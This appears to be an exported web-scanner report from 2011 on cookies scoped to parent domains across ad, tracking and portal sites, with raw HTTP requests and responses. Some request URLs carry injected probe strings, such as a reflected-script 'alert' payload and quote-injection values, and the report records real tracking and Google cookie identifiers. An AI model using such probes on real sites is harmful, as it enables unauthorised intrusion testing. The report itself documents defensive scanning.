HTTP/1.1 302 Moved Temporarily Server: Apache-Coyote/1.1 Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-store,no-cache,must-revalidate Cache-Control: post-check=0,pre-check=0 Pragma: no-cache p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: adp=7CUZ^0^8191; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ Set-Cookie: smdmp=7CVs:99004680^7BUF:99061898^780z:1215201001^780z:201201001^780z:1012200938^780z:1011201009^77xf:99004015^77xe:99001525^77x6:99011769^75W4:99002797^75W4:99004740^74ry:104201102^74ry:811200901^74Xd:99063500; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ Set-Cookie: adf=7CUZ^0^0; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: ug=uosDj9Liw_xRTA; Domain=.specificclick.net; Expires=Fri, 03-Feb-2012 19:03:59 GMT; Path=/ p3p: policyref="http://www.specificmedia.com/w3c/p3p.xml", CP="NON DSP COR ADM DEV PSA PSD IVA OUT BUS STA" Set-Cookie: nug=; Domain=.specificclick.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Location: http://www.googleadservices.com/pagead/conversion/1030885431/?label=z3WgCNenmAIQt6DI6wM&guid=ON&script=0 Content-Type: text/html Content-Length: 0 Date: Thu, 03 Feb 2011 19:03:58 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /buzz HTTP/1.1 Host: buzz.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Found Date: Thu, 03 Feb 2011 19:35:40 GMT Set-Cookie: B=fjoviv16km0sc&b=3&s=eo; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Set-Cookie: of01e2=08556806c2aa36978721cfcb146d3d49; path=/; domain=buzz.yahoo.com Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0, private Pragma: no-cache Location: http://login.yahoo.com/?.pd=c%3DhYw09vWp2e4FXlpTB9bd0rU-&.src=ybz&.intl=us&.done=http%3A%2F%2Fbuzz.yahoo.com%2Fvote%2F Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 83
<!-- fe13.buzz.re1.yahoo.com uncompressed/chunked Thu Feb 3 11:35:40 PST 2011 -->
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&RedC=c.msn.com&MXFR=AD04D6F8B2FF44629973BD0674351135 HTTP/1.1 Accept: */* Referer: http://www.msn.com/ Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: c.redcated Proxy-Connection: Keep-Alive
Response
HTTP/1.1 302 Redirect Cache-Control: private, no-cache, proxy-revalidate Pragma: no-cache Location: http://c.msn.com/c.gif?jsv=3525&jsa=view&pi=7317&ps=95101&di=340&tp=http%3A%2F%2Fwww.msn.com%2Fdefaultwpe7.aspx&lng=en-us&tz=-6&scr=1920x1200x16&rid=89026872c5cc408f95bb663ec7f2d02f&udc=true&rnd=1296786631905&MUID=AD04D6F8B2FF44629973BD0674351135 Server: Microsoft-IIS/7.5 X-Powered-By: ASP.NET P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Set-Cookie: MUID=AD04D6F8B2FF44629973BD0674351135; domain=.redcated; expires=Tue, 23-Aug-2011 02:29:39 GMT; path=/; Date: Fri, 04 Feb 2011 02:29:38 GMT Content-Length: 0
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AVE/go/285974183/direct HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_PreRollCompanion P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296770644-3981256; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=5F36AEF5D4FB49DB9F81F864E31B34FC; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=c003d4d/243a7/110b9ea7/af02/4d4b2654; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Thu, 03 Feb 2011 22:04:03 GMT Connection: close
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /AVE/go/286182932/direct/01/]] HTTP/1.1 Host: clk.redcated Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 302 Object moved Cache-Control: no-store Content-Length: 0 Expires: 0 Location: http://www.hollandamerica.com/find-cruise-vacation/OnlineAdOffers.action?specialOfferType=onad_28&WT.mc_id=Partner_ScanScout_US_WonderPreRoll P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC" Set-Cookie: AA002=001296770649-3995471; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: MUID=8EE4F442F1FB4932AD6D6003B4E01B9A; expires=Monday, 22-Aug-2011 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach00=af02/243a7; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Set-Cookie: ach01=bcab411/243a7/110ece14/af02/4d4b2659; expires=Saturday, 02-Feb-2013 00:00:00 GMT; path=/; domain=.redcated Connection: close Date: Thu, 03 Feb 2011 22:04:08 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/simplemodal/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /p/swfobject/ HTTP/1.1 Host: code.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /adServer/adServerESI.aspx HTTP/1.1 Host: core.insightexpressai.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/7.0 Content-Length: 18 Content-Type: text/html; charset=utf-8 Set-Cookie: DW=221e32e71296770758; expires=Wed, 29-Jan-2031 22:05:58 GMT; path=/; domain=insightexpressai.com P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA" Expires: Thu, 03 Feb 2011 22:05:58 GMT Pragma: no-cache Date: Thu, 03 Feb 2011 22:05:58 GMT Connection: close Cache-Control: no-store
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/ HTTP/1.1 Host: developer.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 19:47:44 GMT Set-Cookie: B=auto2ed6km1j0&b=3&s=j0; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 29638
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /yui/license.html HTTP/1.1 Host: developer.yahoo.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 18:04:29 GMT Set-Cookie: B=1pm748p6klrhd&b=3&s=dl; expires=Tue, 03-Feb-2013 20:00:00 GMT; path=/; domain=.yahoo.com P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV" Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Cache-Control: private Content-Length: 22172
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8"> <meta name="descr ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /red/psi/sites/www.ip-adress.com/p.json?callback=_ate.ad.hpr&uid=4d1ec56b7612a62c&url=http%3A%2F%2Fwww.ip-adress.com%2Fwhois%2Fsmartdevil.com44a08'%253b28a34fbd60c%2Fx22&ref=http%3A%2F%2Fburp%2Fshow%2F36&1l3wvz8 HTTP/1.1 Host: ds.addthis.com Proxy-Connection: keep-alive Referer: http://s7.addthis.com/static/r07/sh31.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: loc=US%2CMjAwMDFOQVVTREMyMTg4MTAyOTUxMTAwMDAwVg%3d%3d; dt=X; di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296751058.60|1296659685.66; psc=4; uid=4d1ec56b7612a62c
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Content-Length: 286 Content-Type: text/javascript Set-Cookie: bt=; Domain=.addthis.com; Expires=Fri, 04 Feb 2011 17:55:19 GMT; Path=/ Set-Cookie: dt=X; Domain=.addthis.com; Expires=Sun, 06 Mar 2011 17:55:19 GMT; Path=/ Set-Cookie: di=%7B%222%22%3A%22914803576615380%2CrcHW800iZiMAAocf%22%7D..1295452270.19F|1296842119.60|1296659685.66; Domain=.addthis.com; Expires=Sun, 03-Feb-2013 02:28:36 GMT; Path=/ P3P: policyref="/w3c/p3p.xml", CP="NON ADM OUR DEV IND COM STA" Expires: Fri, 04 Feb 2011 17:55:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 04 Feb 2011 17:55:19 GMT Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /ssframework/dt/pt.png?trackcd=1288991585470 HTTP/1.1 Host: dt.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203; networkInfo=57872|110203_160737|626|33687174|null|5945246|1426141|1|14.0|true|4|true|us|V|0; campUnique=1426141; sssrvyhst2=110203_1426141
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 21:07:44 GMT Server: Apache p3p: policyref=/w3c/p3p.xml Set-Cookie: behavioralSegments=29_110203|32_110203|263_110203; Domain=.scanscout.com; Expires=Fri, 03-Feb-2012 21:07:44 GMT; Path=/ Content-Length: 101 Connection: close Content-Type: image/png
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /quant.js HTTP/1.1 Host: edge.quantserve.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Connection: close ETag: "18334:E0-1152220633-1296770771366" Vary: Accept-Encoding Last-Modified: Thu, 03-Feb-2011 22:06:11 GMT Content-Type: application/x-javascript Set-Cookie: mc=4d4b26d3-59834-71bae-edc2f; expires=Thu, 03-Feb-2021 22:06:11 GMT; path=/; domain=.quantserve.com P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR SAMa IND COM NAV" Cache-Control: private, no-transform, must-revalidate, max-age=86400 Expires: Fri, 04 Feb 2011 22:06:11 GMT Content-Length: 5265 Date: Thu, 03 Feb 2011 22:06:11 GMT Server: QS
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /showthread.php?t\\x3d1355583\\x22 HTTP/1.1 Host: forums.digitalpoint.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=60&slotname=2067036752&w=468&lmt=1296787016&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787016748&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529&correlator=1296787013038&frm=0&adk=2139689042&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=2&dtd=12&xpc=YHKwpL9Wg6&p=http%3A//www.bizfind.us HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: googleads.g.doubleclick.net Proxy-Connection: Keep-Alive Cookie: test_cookie=CheckForPermission
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Set-Cookie: id=2299c2bdf900002f||t=1296786962|et=730|cs=ziqtnqpy; expires=Sun, 03-Feb-2013 02:36:02 GMT; path=/; domain=.doubleclick.net Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT X-Content-Type-Options: nosniff Date: Fri, 04 Feb 2011 02:36:02 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Expires: Fri, 04 Feb 2011 02:36:02 GMT Content-Length: 5976
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#993400;cursor:hand;}body,table,div,ul,li{font-size ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=7707606529&w=728&lmt=1296787013&flash=0&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787012997&shv=r20101117&jsv=r20110120&saldr=1&correlator=1296787013038&frm=0&adk=1367998553&ga_vid=1487308896.1296787013&ga_sid=1296787013&ga_hid=720933573&ga_fc=1&u_tz=-360&u_his=0&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=0&u_nmime=0&biw=1172&bih=684&eid=30143103&fu=0&ifi=1&dtd=145&xpc=LTjYuEf78i&p=http%3A//www.bizfind.us HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0) Accept-Encoding: gzip, deflate Host: googleads.g.doubleclick.net Proxy-Connection: Keep-Alive
Response
HTTP/1.1 200 OK P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Set-Cookie: test_cookie=CheckForPermission; expires=Fri, 04-Feb-2011 02:50:59 GMT; path=/; domain=.doubleclick.net X-Content-Type-Options: nosniff Date: Fri, 04 Feb 2011 02:35:59 GMT Server: cafe Cache-Control: private, x-gzip-ok="" X-XSS-Protection: 1; mode=block Expires: Fri, 04 Feb 2011 02:35:59 GMT Content-Length: 4758
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /grphp HTTP/1.1 Host: groups.google.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The following cookie was issued by the application and is scoped to a parent of the issuing domain:
vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Fri, 03 Feb 2012 20:32:22 GMT
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /clickaider.js HTTP/1.1 Host: hit.clickaider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sid=4d3f2276-241363738113; clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; vid=3e136b53-42127475201;
Response
HTTP/1.1 200 OK Connection: close P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA" Expires: Fri, 04 Feb 2011 20:32:22 GMT Cache-Control: private, max-age=86400 Set-Cookie: vid=3e136b53-42127475201; Path=/; Version=1; Domain=.clickaider.com; Expires=Fri, 03 Feb 2012 20:32:22 GMT Content-Type: application/x-javascript Content-Length: 9501 Date: Thu, 03 Feb 2011 20:32:22 GMT Server: lighttpd/1.4.18
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /pv?lng=156&&lnks=&t=Boardreader%20-%20Forum%20Search%20Engine&c=9f671068-5&r=&tz=-360&var1=main%20page&var3=general%20user&loc=http%3A%2F%2Fboardreader.com%2F&rnd=5831 HTTP/1.1 Host: hit.clickaider.com Proxy-Connection: keep-alive Referer: http://boardreader.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: vid=3e136b53-42127475201
Response
HTTP/1.1 200 OK X-Powered-By: PHP/5.1.6 P3P: policyref="/w3c/p3p.xml", CP="NON DSP COR CUR ADM DEV PSA PSD OUR UNR BUS UNI COM NAV INT DEM STA" Set-Cookie: clickdata=eNptzDsOwjAQhOG7bA9%2BINt49jQO3ogUkGjtBkW5Ow415f%2BNNAUOe4OzoDzH5Gy8XwJxQTg5gZq0KrIRL3Dc4EG9%2FcLnmKJPPg%2B9gZb%2FrDITT7CjAkjeXT903ozp2fsGY6a1aFUpVfT6WF%2BG%2BDi%2B%2FiwqyA%3D%3D; path=/; domain=.clickaider.com Set-Cookie: sid=4d3f2276-241363738113; path=/; domain=.clickaider.com Cache-Control: no-cache, private, proxy-revalidate, max-age=86400 Pragma: no-cache Content-Type: image/gif Content-Length: 43 Date: Thu, 03 Feb 2011 19:52:09 GMT Server: lighttpd/1.4.18
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /verify/EAAAACH56svoxGh0pQKQS_SWJUw.gif HTTP/1.1 Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SNID=43=1x_JRAnhVh0aezZvVbButQc6VLCkeQ4CCDimZx9OaQ=6FvUugeFs7hoYGaI; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /verify/EAAAADYWfsu5HsvuyGjqK9465xg.gif HTTP/1.1 Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=Abc+Development Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SNID=43=w_Qdc_R1bbRlDs-dYzZ1XxBBP7Rr8d8PCxLqZ6cCRg=FM5tsiHXMmG0LJWl; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /verify/EAAAAIVT7-vGYB4446LYcy48YVM.gif HTTP/1.1 Host: id.google.com Proxy-Connection: keep-alive Referer: http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SNID=43=MInFyyM8yCTUzGr8cP7TNrs0RJ5g93nqipFbcotH9w=SFQpwHyDfkoyN23H; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt; NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ssframework/log/log.png?a=logitemaction&CbC=1&CbF=true&EC=3&RC=3&SmC=2&AmN=1&CbM=b25%2F1&admode=preroll&VI=33687174&PRI=1386067554&VC=0&Uzip=N%2FA&RvN=1&RprC=0&ADsn=1&VcaI=96%2C192%2C200&RrC=0&VgI=26d91cdf5493d1dd943311e83ddb679d&SfF=true&AVI=57872&Ust=dc&Uctry=us&AC=4&CI=1426141&PI=626&CC=0&Udma=511&ADI=5945246&VmC=0&VscaI=96&VclF=true&PC=1 HTTP/1.1 Host: l0.scanscout.com Proxy-Connection: keep-alive Referer: http://www.veoh.com/static/swf/webplayer/WebPlayer.swf?version=AFrontend.5.5.4.1038 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: userCookie=4673e32b6fda399c64d2cb48d3800e10; uniques=110203|626_110203; psh=626_1296767254411; behavioralSegments=29_110203|32_110203
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.chat?cwdid=1954365562430760092&wdid=798708614246318013&rdid=1201083812220968228&vr=&vn=&vi=&ve=&vp=&iq=&curl= HTTP/1.1 Host: livechat.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Resin/2.1.17 Cache-Control: no-cache,no-store Pragma: no-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM", policyref="http://my.boldchat.com/w3c/p3p.xml" Set-Cookie: bc-visitor-id=798708614246318013=948822557773872607; domain=.boldchat.com; path=/; expires=Fri, 03-Feb-2012 19:47:54 GMT Set-Cookie: bc-visit-id=798708614246318013=9223372036839677808; domain=.boldchat.com; path=/ Set-Cookie: JSESSIONID=a_SsnwztJaxd; path=/ Content-Type: text/html; charset=utf-8 Date: Thu, 03 Feb 2011 19:47:53 GMT Content-Length: 11752
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /aid/3760177095415339810/bc.chat HTTP/1.1 Host: livechat.boldchat.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
